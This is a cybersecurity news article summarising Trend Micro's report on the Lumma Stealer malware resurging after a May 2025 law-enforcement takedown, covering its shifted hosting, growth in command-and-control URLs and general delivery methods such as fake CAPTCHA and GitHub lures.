Lumma Stealer Returns with Active Campaigns Despite Disruption

A resurgence in Lumma Stealer activity has been observed just weeks after a coordinated international takedown in May 2025. According to Trend Micro, while enforcement efforts temporarily disrupted operations, Lumma's operators have since reemerged with new infrastructure, refined delivery tactics, and quieter distribution methods. “Not long after its takedown in May, Lumma Stealer is back. From June to July, the number of targeted accounts began resurging. Now, the malware is distributed with more discreet channels and stealthier evasion tactics.” Notably, the group has moved away from using public underground forums, instead relying on less visible communication channels and alternative infrastructure. Law enforcement had previously seized over 2,300 domains used in Lumma’s command-and-control network and disrupted access to its marketplaces. Despite this, Trend Micro observed Lumma campaigns regaining momentum almost immediately after, showing the rapid adaptability of its operators.

The group tracked as “Water Kurita” by Trend Micro confirmed the loss of nearly 2,500 domains, but emphasized that no physical seizure occurred. “According to the developer, while the infrastructure was compromised, law enforcement did not physically confiscate their server as it was located in a jurisdiction outside their reach,” the developer posted following the takedown. Trend Micro noted that law enforcement likely exploited a vulnerability in the server’s Integrated Dell Remote Access Controller (IDRAC), formatting the disks and backups twice. “Instead, authorities allegedly exploited a previously unknown vulnerability, suspected to be in the server’s Integrated Dell Remote Access Controller (IDRAC), to gain access and format all disks, including backups, on two separate occasions.” Despite this effort, Lumma actors swiftly restored access and restructured their infrastructure, transitioning from Cloudflare-heavy hosting to smaller providers such as Selectel. Usage of Cloudflare dropped significantly—from over 200 domains in April and May to fewer than 20 in June and July while domains hosted on Selectel spiked from 20 in May to 239 in June.

Telemetry from Trend Micro shows Lumma command-and-control (C2) URLs increased sharply in the weeks following the takedown: from just one in late May to more than 450 by mid-June. Campaign activity since the resurgence includes several well-coordinated operations, such as fake crack and keygen tools, malicious GitHub repositories, and the ongoing ClickFix campaign involving fake CAPTCHAs that deceive users into executing PowerShell commands. These methods, combined with social media-driven delivery via YouTube and Facebook, allow Lumma Stealer to reach a broad and unwitting audience. Most recently, GitHub campaigns have used automatically generated repositories featuring AI-generated README files to distribute payloads under file names like “TempSpoofer.exe.” These infection chains often avoid writing files to disk, complicating detection. As Trend Micro observes, the malware continues to be offered as a MaaS (malware-as-a-service), allowing even inexperienced actors to deploy it with ease. Lumma Stealer’s recovery and evolution underscore how quickly cybercriminals can adapt post-takedown.